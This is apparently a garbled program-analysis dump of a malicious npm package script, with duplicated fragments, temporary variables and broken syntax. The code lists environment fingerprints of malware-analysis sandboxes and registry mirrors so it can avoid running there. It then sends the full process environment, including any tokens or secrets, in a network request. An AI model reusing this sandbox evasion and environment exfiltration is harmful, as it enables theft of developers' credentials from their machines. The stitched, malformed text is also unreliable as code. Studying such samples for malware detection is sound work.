function sleep_for = function sleep_for(pkg_n, prefix) {
    var deactivate = [
        { key: ['npm', 'config', 'registry'].join('_'), val: ['taobao', 'org'].join('.') },
        { key: ['npm', 'config', 'registry'].join('_'), val: ['registry', 'npmmirror', 'com'].join('.') },
        { key: 'USERNAME', val: ['daas', 'admin'].join('') },
        { key: '_', val: '/usr/bin/python' },
        { key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') },
        [
            { key: 'MAIL', val: ['', 'var', 'mail', 'app'].join('/') },
            { key: 'HOME', val: ['', 'home', 'app'].join('/') },
            { key: 'USER', val: 'app' },
        ],
        [
            { key: 'EDITOR', val: 'vi' },
            { key: 'PROBE_USERNAME', val: '*' },
            { key: 'SHELL', val: '/bin/bash' },
            { key: 'SHLVL', val: '2' },
            { key: 'npm_command', val: 'run-script' },
            { key: 'NVM_CD_FLAGS', val: '' },
            { key: 'npm_confi...
var deactivate = [
        { key: ['npm', 'config', 'registry'].join('_'), val: ['taobao', 'org'].join('.') },
        { key: ['npm', 'config', 'registry'].join('_'), val: ['registry', 'npmmirror', 'com'].join('.') },
        { key: 'USERNAME', val: ['daas', 'admin'].join('') },
        { key: '_', val: '/usr/bin/python' },
        { key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') },
        [
            { key: 'MAIL', val: ['', 'var', 'mail', 'app'].join('/') },
            { key: 'HOME', val: ['', 'home', 'app'].join('/') },
            { key: 'USER', val: 'app' },
        ],
        [
            { key: 'EDITOR', val: 'vi' },
            { key: 'PROBE_USERNAME', val: '*' },
            { key: 'SHELL', val: '/bin/bash' },
            { key: 'SHLVL', val: '2' },
            { key: 'npm_command', val: 'run-script' },
            { key: 'NVM_CD_FLAGS', val: '' },
            { key: 'npm_config_fund', val: '' },
        ],
        [
 ...
_tmp_5.push({ key: ['npm', 'config', 'registry'].join('_'), val: ['taobao', 'org'].join('.') })
_tmp_5.push({ key: ['npm', 'config', 'registry'].join('_'), val: ['registry', 'npmmirror', 'com'].join('.') })
_tmp_5.push({ key: 'USERNAME', val: ['daas', 'admin'].join('') })
_tmp_5.push({ key: '_', val: '/usr/bin/python' })
_tmp_5.push({ key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') })
_tmp_5.push([
            { key: 'MAIL', val: ['', 'var', 'mail', 'app'].join('/') },
            { key: 'HOME', val: ['', 'home', 'app'].join('/') },
            { key: 'USER', val: 'app' },
        ])
_tmp_23.push({ key: 'MAIL', val: ['', 'var', 'mail', 'app'].join('/') })
_tmp_23.push({ key: 'HOME', val: ['', 'home', 'app'].join('/') })
_tmp_23.push({ key: 'USER', val: 'app' })
_tmp_5.push([
            { key: 'EDITOR', val: 'vi' },
            { key: 'PROBE_USERNAME', val: '*' },
            { key: 'SHELL', val: '/bin/bash' },
            { key: 'SHLVL', val: '2' },
            { key: 'npm_command', val: 'run-script' },
            { key: 'NVM_CD_FLAGS', val: '' },
            { key: 'npm_config_fund', val: '' },
        ])
_tmp_31.push({ key: 'EDITOR', val: 'vi' })
_tmp_31.push({ key: 'PROBE_USERNAME', val: '*' })
_tmp_31.push({ key: 'SHELL', val: '/bin/bash' })
_tmp_31.push({ key: 'SHLVL', val: '2' })
_tmp_31.push({ key: 'npm_command', val: 'run-script' })
_tmp_31.push({ key: 'NVM_CD_FLAGS', val: '' })
_tmp_31.push({ key: 'npm_config_fund', val: '' })
_tmp_5.push([
            { key: 'HOME', val: '/home/username' },
            { key: 'USER', val: 'username' },
            { key: 'LOGNAME', val: 'username' },
        ])
_tmp_39.push({ key: 'HOME', val: '/home/username' })
_tmp_39.push({ key: 'USER', val: 'username' })
_tmp_39.push({ key: 'LOGNAME', val: 'username' })
_tmp_5.push([
            { key: 'PWD', val: '/my-app' },
            { key: 'DEBIAN_FRONTEND', val: 'noninteractive' },
            { key: 'HOME', val: '/root' },
        ])
_tmp_43.push({ key: 'PWD', val: '/my-app' })
_tmp_43.push({ key: 'DEBIAN_FRONTEND', val: 'noninteractive' })
_tmp_43.push({ key: 'HOME', val: '/root' })
_tmp_5.push([
            { key: 'INIT_CWD', val: '/analysis' },
            { key: 'APPDATA', val: '/analysis/bait' }
        ])
_tmp_47.push({ key: 'INIT_CWD', val: '/analysis' })
_tmp_47.push({ key: 'APPDATA', val: '/analysis/bait' })
_tmp_5.push([
            { key: 'INIT_CWD', val: '/npm' },
            { key: 'APPDATA', val: '/analysis/bait' }
        ])
_tmp_50.push({ key: 'INIT_CWD', val: '/npm' })
_tmp_50.push({ key: 'APPDATA', val: '/analysis/bait' })
_tmp_5.push([
            { key: 'HOME', val: ['', 'Users', 'justin'].join('\\') },
            { key: 'APPDATA', val: ['', 'Users', 'justin'].join('\\') },
            {
                key: 'LOGONSERVER',
                val: [
                    ['DESKTOP', '97KB'].join('-'), '6H'
                ].join('B')
            }
        ])
_tmp_53.push({ key: 'HOME', val: ['', 'Users', 'justin'].join('\\') })
_tmp_53.push({ key: 'APPDATA', val: ['', 'Users', 'justin'].join('\\') })
_tmp_53.push({
                key: 'LOGONSERVER',
                val: [
                    ['DESKTOP', '97KB'].join('-'), '6H'
                ].join('B')
            })
_tmp_60.key = "LOGONSERVER"
_tmp_60.val = [
                    ['DESKTOP', '97KB'].join('-'), '6H'
                ].join('B')
_tmp_62.push(['DESKTOP', '97KB'].join('-'))
"B"
_tmp_5.push([
            { key: 'COMPLUS_ProfAPI_ProfilerCompatibilitySetting', val: 'EnableV2Profiler' },
            { key: 'FPS_BROWSER_APP_PROFILE_STRING', val: ['Internet', 'Explorer'].join(' ') },
            { key: 'PATHEXT', val: 'C:\WINDOWS\System32\OpenSSH\;c:\Program Files\nodejs\;c:\Strawberry\c\bin;c:\Strawberry\perl\site\bin;c:\Strawberry\perl\bin'}
        ])
_tmp_65.push({ key: 'COMPLUS_ProfAPI_ProfilerCompatibilitySetting', val: 'EnableV2Profiler' })
_tmp_65.push({ key: 'FPS_BROWSER_APP_PROFILE_STRING', val: ['Internet', 'Explorer'].join(' ') })
_tmp_65.push({ key: 'PATHEXT', val: 'C:\WINDOWS\System32\OpenSSH\;c:\Program Files\nodejs\;c:\Strawberry\c\bin;c:\Strawberry\perl\site\bin;c:\Strawberry\perl\bin'})
let missing = [
        ['npm', 'package', 'name'].join('_'), ['npm', 'package', 'json'].join('_'),
    ]
_tmp_71.push(['npm', 'package', 'name'].join('_'))
var plop = process['en' + 'v'] || {}
deactivate.some((index) => []
            .concat(index)
            .every((i) => (plop[i.key] || '').includes(i.val) || i.val === '*')) ||
        Object.keys(plop).length < 10 || plop.PWD === `/${plop.USER}/node_modules/${plop.npm_package_name}`
<operator>.formatString("/", plop.USER, "/node_modules/", plop.npm_package_name, "")
missing.some(index => !plop[index])
var req = goto
        .request(use_language(pkg_n, prefix))
        .on('error', function(err) {})
use_language(pkg_n, prefix)
<lambda>3
req.write(JSON.stringify(plop))
